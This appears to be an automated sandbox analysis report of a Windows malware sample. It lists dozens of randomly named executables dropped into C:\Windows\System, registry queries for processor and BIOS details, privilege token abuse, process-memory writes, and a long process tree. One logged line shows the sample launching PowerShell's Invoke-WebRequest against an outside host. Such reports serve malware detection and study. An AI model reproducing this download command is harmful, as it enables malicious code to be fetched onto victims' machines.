File created C:\Windows\System\cefxEMe.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\CdRdRMZ.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\dseckst.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\kCuaBZa.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\VEZmrfY.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\HOOVIUX.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\DobXGNS.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ucAfRPb.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\OjzeWtp.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\LYfVhng.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\WtothQJ.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\wQDqFIW.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\CZZnZrV.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\NQAMBUZ.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\NiiHrBD.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\XSSFLtA.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\XxAKPdU.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\isxCUqm.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\eXdTZLJ.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\wNivYNp.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\NgynUIX.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\MqDESBE.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4160 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4160 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4160 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\pOmrvFO.exe
PID 4160 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\pOmrvFO.exe
PID 4160 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\fxkcLyW.exe
PID 4160 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\fxkcLyW.exe
PID 4160 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\VgnoeXt.exe
PID 4160 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\VgnoeXt.exe
PID 4160 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\VyrkNAX.exe
PID 4160 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\VyrkNAX.exe
PID 4160 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\mujUMzN.exe
PID 4160 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\mujUMzN.exe
PID 4160 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\dETUCKO.exe
PID 4160 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\dETUCKO.exe
PID 4160 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\MEkVqFo.exe
PID 4160 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\MEkVqFo.exe
PID 4160 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\rRWQTSv.exe
PID 4160 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\rRWQTSv.exe
PID 4160 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\MUqLiCQ.exe
PID 4160 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\MUqLiCQ.exe
PID 4160 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\LGUkPRp.exe
PID 4160 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\LGUkPRp.exe
PID 4160 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\XSSFLtA.exe
PID 4160 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\XSSFLtA.exe
PID 4160 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\gCIcbYL.exe
PID 4160 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\gCIcbYL.exe
PID 4160 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\rrXYEWz.exe
PID 4160 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\rrXYEWz.exe
PID 4160 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\qviublZ.exe
PID 4160 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\qviublZ.exe
PID 4160 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\CzLKhql.exe
PID 4160 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\CzLKhql.exe
PID 4160 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\IrGSluo.exe
PID 4160 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\IrGSluo.exe
PID 4160 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FISNCqh.exe
PID 4160 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FISNCqh.exe
PID 4160 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\kDzfUCS.exe
PID 4160 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\kDzfUCS.exe
PID 4160 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\uujohOn.exe
PID 4160 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\uujohOn.exe
PID 4160 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\TnrmgkH.exe
PID 4160 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\TnrmgkH.exe
PID 4160 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\XxAKPdU.exe
PID 4160 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\XxAKPdU.exe
PID 4160 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\iWJoXbr.exe
PID 4160 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\iWJoXbr.exe
PID 4160 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eMohHmq.exe
PID 4160 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eMohHmq.exe
PID 4160 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\xwaSKcI.exe
PID 4160 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\xwaSKcI.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\ctcPhQt.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\ctcPhQt.exe
PID 4160 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\ExYaxMn.exe
PID 4160 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\ExYaxMn.exe
PID 4160 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\algRZeR.exe
PID 4160 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\algRZeR.exe
PID 4160 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\OxfDWMk.exe
PID 4160 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\OxfDWMk.exe
PID 4160 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\WOCpOMS.exe
PID 4160 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\WOCpOMS.exe
PID 4160 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\vpwPBYq.exe
PID 4160 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\vpwPBYq.exe
PID 4160 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\ckLjbln.exe
PID 4160 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\ckLjbln.exe

Processes

C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\pOmrvFO.exe

C:\Windows\System\pOmrvFO.exe

C:\Windows\System\fxkcLyW.exe

C:\Windows\System\fxkcLyW.exe

C:\Windows\System\VgnoeXt.exe

C:\Windows\System\VgnoeXt.exe

C:\Windows\System\VyrkNAX.exe

C:\Windows\System\VyrkNAX.exe

C:\Windows\System\mujUMzN.exe

C:\Windows\System\mujUMzN.exe

C:\Windows\System\dETUCKO.exe

C:\Windows\System\dETUCKO.exe

C:\Windows\System\MEkVqFo.exe

C:\Windows\System\MEkVqFo.exe

C:\Windows\System\rRWQTSv.exe

C:\Windows\System\rRWQTSv.exe

C:\Windows\System\MUqLiCQ.exe

C:\Windows\System\MUqLiCQ.exe

C:\Windows\System\LGUkPRp.exe

C:\Windows\System\LGUkPRp.exe

C:\Windows\System\XSSFLtA.exe

C:\Windows\System\XSSFLtA.exe

C:\Windows\System\gCIcbYL.exe

C:\Windows\System\gCIcbYL.exe

C:\Windows\System\rrXYEWz.exe

C:\Windows\System\rrXYEWz.exe

C:\Windows\System\qviublZ.exe

C:\Windows\System\qviublZ.exe

C:\Windows\System\CzLKhql.exe

C:\Windows\System\CzLKhql.exe

C:\Windows\System\IrGSluo.exe

C:\Windows\System\IrGSluo.exe

C:\Windows\System\FISNCqh.exe

C:\Windows\System\FISNCqh.exe

C:\Windows\System\kDzfUCS.exe

C:\Windows\System\kDzfUCS.exe

C:\Windows\System\uujohOn.exe

C:\Windows\System\uujohOn.exe

C:\Windows\System\TnrmgkH.exe

C:\Windows\System\TnrmgkH.exe

C:\Windows\System\XxAKPdU.exe

C:\Windows\System\XxAKPdU.exe

C:\Windows\System\iWJoXbr.exe

C:\Windows\System\iWJoXbr.exe

C:\Windows\System\eMohHmq.exe

C:\Windows\System\eMohHmq.exe

C:\Windows\System\xwaSKcI.exe

C:\Windows\System\xwaSKcI.exe

C:\Windows\System\ctcPhQt.exe

C:\Windows\System\ctcPhQt.exe

C:\Windows\System\ExYaxMn.exe

C:\Windows\System\ExYaxMn.exe

C:\Windows\System\algRZeR.exe

C:\Windows\System\algRZeR.exe

C:\Windows\System\OxfDWMk.exe

C:\Windows\System\OxfDWMk.exe

C:\Windows\System\WOCpOMS.exe

C:\Windows\System\WOCpOMS.exe

C:\Windows\System\vpwPBYq.exe

C:\Windows\System\vpwPBYq.exe

C:\Windows\System\ckLjbln.exe

C:\Windows\System\ckLjbln.exe

C:\Windows\System\FLPpmxV.exe

C:\Windows\System\FLPpmxV.exe

C:\Windows\System\fPOaFVG.exe

C:\Windows\System\fPOaFVG.exe

C:\Windows\System\awKOqDm.exe

C:\Windows\System\awKOqDm.exe

C:\Windows\System\rZQUWaj.exe

C:\Windows\System\rZQUWaj.exe

C:\Windows\System\eJBRUQe.exe

C:\Windows\System\eJBRUQe.exe

C:\Windows\System\ZBmQVKi.exe

C:\Windows\System\ZBmQVKi.exe

C:\Windows\System\bolbXiY.exe

C:\Windows\System\bolbXiY.exe

C:\Windows\System\JWavdeb.exe

C:\Windows\System\JWavdeb.exe

C:\Windows\System\yJobRTi.exe

C:\Windows\System\yJobRTi.exe

C:\Windows\System\AWTFLrd.exe

C:\Windows\System\AWTFLrd.exe

C:\Windows\System\SdvBATe.exe

C:\Windows\System\SdvBATe.exe

C:\Windows\System\oVWfjUm.exe

C:\Windows\System\oVWfjUm.exe

C:\Windows\System\azaNCFu.exe

C:\Windows\System\azaNCFu.exe

C:\Windows\System\fEvvfNW.exe

C:\Windows\System\fEvvfNW.exe

C:\Windows\System\VidWivK.exe

C:\Windows\System\VidWivK.exe

C:\Windows\System\OgQUcFu.exe

C:\Windows\System\OgQUcFu.exe

C:\Windows\System\sVdFfSU.exe

C:\Windows\System\sVdFfSU.exe

C:\Windows\System\CODoCmR.exe

C:\Windows\System\CODoCmR.exe

C:\Windows\System\ihIxYlL.exe

C:\Windows\System\ihIxYlL.exe

C:\Windows\System\GXoUYQi.exe

C:\Windows\System\GXoUYQi.exe

C:\Windows\System\jUTEKnp.exe

C:\Windows\System\jUTEKnp.exe

C:\Windows\System\PkWyFXR.exe

C:\Windows\System\PkWyFXR.exe

C:\Windows\System\ucAfRPb.exe

C:\Windows\System\ucAfRPb.exe

C:\Windows\System\aFcRUls.exe

C:\Windows\System\aFcRUls.exe

C:\Windows\System\ubfQCao.exe

C:\Windows\System\ubfQCao.exe

C:\Windows\System\gRhBScf.exe

C:\Windows\System\gRhBScf.exe

C:\Windows\System\nYkoaYX.exe

C:\Windows\System\nYkoaYX.exe

C:\Windows\System\vXBPIrB.exe

C:\Windows\System\vXBPIrB.exe

C:\Windows\System\JfJLUZb.exe

C:\Windows\System\JfJLUZb.exe

C:\Windows\System\pNKXusl.exe

C:\Windows\System\pNKXusl.exe

C:\Windows\System\RDlQKTn.exe

C:\Windows\System\RDlQKTn.exe

C:\Windows\System\eOPpPws.exe

C:\Windows\System\eOPpPws.exe

C:\Windows\System\aOwRRYw.exe

C:\Windows\System\aOwRRYw.exe

C:\Windows\System\zrVycNZ.exe

C:\Windows\System\zrVycNZ.exe

C:\Windows\System\benRwUs.exe

C:\Windows\System\benRwUs.exe

C:\Windows\System\FdYrSRC.exe

C:\Windows\System\FdYrSRC.exe

C:\Windows\System\oSjzbDs.exe

C:\Windows\System\oSjzbDs.exe

C:\Windows\System\HtfXhsb.exe

C:\Windows\System\HtfXhsb.exe

C:\Windows\System\eMrmQuY.exe

C:\Windows\System\eMrmQuY.exe

C:\Windows\System\XKAPvGU.exe

C:\Windows\System\XKAPvGU.exe

C:\Windows\System\rubJpVV.exe

C:\Windows\System\rubJpVV.exe

C:\Windows\System\VoZxBzx.exe

C:\Windows\System\VoZxBzx.exe

C:\Windows\System\JAtIqmO.exe

C:\Windows\System\JAtIqmO.exe

C:\Windows\System\MKIkVtD.exe

C:\Windows\System\MKIkVtD.exe

C:\Windows\System\CagsQht.exe

C:\Windows\System\CagsQht.exe

C:\Windows\System\JfzSFjK.exe

C:\Windows\System\JfzSFjK.exe

C:\Windows\System\yFZKuRH.exe

C:\Windows\System\yFZKuRH.exe

C:\Windows\System\yhgIyCw.exe

C:\Windows\System\yhgIyCw.exe

C:\Windows\System\MErWWHj.exe

C:\Windows\System\MErWWHj.exe

C:\Windows\System\WBRNYHg.exe

C:\Windows\System\WBRNYHg.exe

C:\Windows\System\JRJNAty.exe

C:\Windows\System\JRJNAty.exe

C:\Windows\System\dpmKHfz.exe

C:\Windows\System\dpmKHfz.exe

C:\Windows\System\rBFYKAZ.exe

C:\Windows\System\rBFYKAZ.exe

C:\Windows\System\oXTFbxs.exe

C:\Windows\System\oXTFbxs.exe

C:\Windows\System\yyynKsh.exe

C:\Windows\System\yyynKsh.exe

C:\Windows\System\xGRJCBK.exe

C:\Windows\System\xGRJCBK.exe

C:\Windows\System\DVTLIoo.exe

C:\Windows\System\DVTLIoo.exe

C:\Windows\System\VdtaerL.exe

C:\Windows\System\VdtaerL.exe

C:\Windows\System\xJJRkbX.exe

C:\Windows\System\xJJRkbX.exe

C:\Windows\System\yOWHHzP.exe

C:\Windows\System\yOWHHzP.exe

C:\Windows\System\XJEAgGK.exe

C:\Windows\System\XJEAgGK.exe

C:\Windows\System\OmuZqBQ.exe

C:\Windows\System\OmuZqBQ.exe

C:\Windows\System\fLiRGNp.exe

C:\Windows\System\fLiRGNp.exe

C:\Windows\System\eOmCFKy.exe

C:\Windows\System\eOmCFKy.exe

C:\Windows\System\xnHcuyQ.exe

C:\Windows\System\xnHcuyQ.exe

C:\Windows\System\ARMJDsP.exe

C:\Windows\System\ARMJDsP.exe

C:\Windows\System\rMaAJBW.exe

C:\Windows\System\rMaAJBW.exe

C:\Windows\System\XUyzMge.exe

C:\Windows\System\XUyzMge.exe

C:\Windows\System\ACBQDdk.exe

C:\Windows\System\ACBQDdk.exe

C:\Windows\System\RAxFuQd.exe

C:\Windows\System\RAxFuQd.exe

C:\Windows\System\gKpoZBf.exe

C:\Windows\System\gKpoZBf.exe

C:\Windows\System\FfsuoIu.exe

C:\Windows\System\FfsuoIu.exe

C:\Windows\System\zELghpL.exe

C:\Windows\System\zELghpL.exe

C:\Windows\System\WtothQJ.exe

C:\Windows\System\WtothQJ.exe

C:\Windows\System\uEWMHeH.exe

C:\Windows\System\uEWMHeH.exe

C:\Windows\System\QZzhwMc.exe

C:\Windows\System\QZzhwMc.exe

C:\Windows\System\OvUeteS.exe

C:\Windows\System\OvUeteS.exe

C:\Windows\System\qqlGpcs.exe

C:\Windows\System\qqlGpcs.exe

C:\Windows\System\GDSwoss.exe

C:\Windows\System\GDSwoss.exe

C:\Windows\System\BDSGGEn.exe

C:\Windows\System\BDSGGEn.exe

C:\Windows\System\mWJEIdn.exe

C:\Windows\System\mWJEIdn.exe

C:\Windows\System\eUWcglJ.exe

C:\Windows\System\eUWcglJ.exe

C:\Windows\System\btfQqvs.exe

C:\Windows\System\btfQqvs.exe

C:\Windows\System\xAYbPtQ.exe

C:\Windows\System\xAYbPtQ.exe

C:\Windows\System\znhuAqx.exe

C:\Windows\System\znhuAqx.exe

C:\Windows\System\nbLIAVE.exe

C:\Windows\System\nbLIAVE.exe

C:\Windows\System\isxCUqm.exe

C:\Windows\System\isxCUqm.exe

C:\Windows\System\CrDulcs.exe

C:\Windows\System\CrDulcs.exe

C:\Windows\System\kGNDFVe.exe

C:\Windows\System\kGNDFVe.exe

C:\Windows\System\aEMfSnw.exe

C:\Windows\System\aEMfSnw.exe

C:\Windows\System\GgkFNYW.exe

C:\Windows\System\GgkFNYW.exe

C:\Windows\System\JwHQKlz.exe

C:\Windows\System\JwHQKlz.exe

C:\Windows\System\EbdnBnd.exe

C:\Windows\System\EbdnBnd.exe

C:\Windows\System\dseckst.exe

C:\Windows\System\dseckst.exe

C:\Windows\System\ixZQiRV.exe

C:\Windows\System\ixZQiRV.exe

C:\Windows\System\sJlYurI.exe

C:\Windows\System\sJlYurI.exe

C:\Windows\System\tymvpLM.exe

C:\Windows\System\tymvpLM.exe

C:\Windows\System\MOYUKOT.exe

C:\Windows\System\MOYUKOT.exe

C:\Windows\System\YYAnkFp.exe

C:\Windows\System\YYAnkFp.exe

C:\Windows\System\lfLIhvX.exe

C:\Windows\System\lfLIhvX.exe

C:\Windows\System\qNDOvur.exe

C:\Windows\System\qNDOvur.exe

C:\Windows\System\Odtjcfm.exe

C:\Windows\System\Odtjcfm.exe

C:\Windows\System\fmDzHXo.exe

C:\Windows\System\fmDzHXo.exe

C:\Windows\System\xaLkUcS.exe

C:\Windows\System\xaLkUcS.exe

C:\Windows\System\YfDbuDo.exe

C:\Windows\System\YfDbuDo.exe

C:\Windows\System\yFgWppU.exe

C:\Windows\System\yFgWppU.exe

C:\Windows\System\ljbOHOq.exe

C:\Windows\System\ljbOHOq.exe

C:\Windows\System\quMChGy.exe

C:\Windows\System\quMChGy.exe

C:\Windows\System\jJfzlmd.exe

C:\Windows\System\jJfzlmd.exe

C:\Windows\System\AMhfQmm.exe

C:\Windows\System\AMhfQmm.exe

C:\Windows\System\lpsWbiU.exe

C:\Windows\System\lpsWbiU.exe

C:\Windows\System\JSBPsLK.exe

C:\Windows\System\JSBPsLK.exe

C:\Windows\System\OtqrygK.exe

C:\Windows\System\OtqrygK.exe

C:\Windows\System\GjBkzYl.exe

C:\Windows\System\GjBkzYl.exe

C:\Windows\System\MbKhtKG.exe

C:\Windows\System\MbKhtKG.exe

C:\Windows\System\YJvqkXc.exe

C:\Windows\System\YJvqkXc.exe

C:\Windows\System\KdIhRtd.exe

C:\Windows\System\KdIhRtd.exe

C:\Windows\System\PKbBtsX.exe

C:\Windows\System\PKbBtsX.exe

C:\Windows\System\yQbSSJo.exe

C:\Windows\System\yQbSSJo.exe

C:\Windows\System\nMXICQB.exe

C:\Windows\System\nMXICQB.exe

C:\Windows\System\BKCLVmV.exe

C:\Windows\System\BKCLVmV.exe

C:\Windows\System\xcyiMKC.exe

C:\Windows\System\xcyiMKC.exe

C:\Windows\System\vNIxbgy.exe

C:\Windows\System\vNIxbgy.exe

C:\Windows\System\CDfvwHV.exe

C:\Windows\System\CDfvwHV.exe

C:\Windows\System\clCukUX.exe

C:\Windows\System\clCukUX.exe

C:\Windows\System\OjzeWtp.exe

C:\Windows\System\OjzeWtp.exe

C:\Windows\System\ekHCVbX.exe

C:\Windows\System\ekHCVbX.exe

C:\Windows\System\QnYaUvk.exe

C:\Windows\System\QnYaUvk.exe

C:\Windows\System\bPIuiSs.exe

C:\Windows\System\bPIuiSs.exe

C:\Windows\System\VOLbZfR.exe

C:\Windows\System\VOLbZfR.exe

C:\Windows\System\hIIzjVG.exe

C:\Windows\System\hIIzjVG.exe

C:\Windows\System\PsztghN.exe

C:\Windows\System\PsztghN.exe

C:\Windows\System\aCATbeY.exe

C:\Windows\System\aCATbeY.exe

C:\Windows\System\KDWkRpD.exe

C:\Windows\System\KDWkRpD.exe

C:\Windows\System\hpNCQFA.exe

C:\Windows\System\hpNCQFA.exe

C:\Windows\System\NnpdgWr.exe

C:\Windows\System\NnpdgWr.exe

C:\Windows\System\hXYrAuo.exe

C:\Windows\System\hXYrAuo.exe

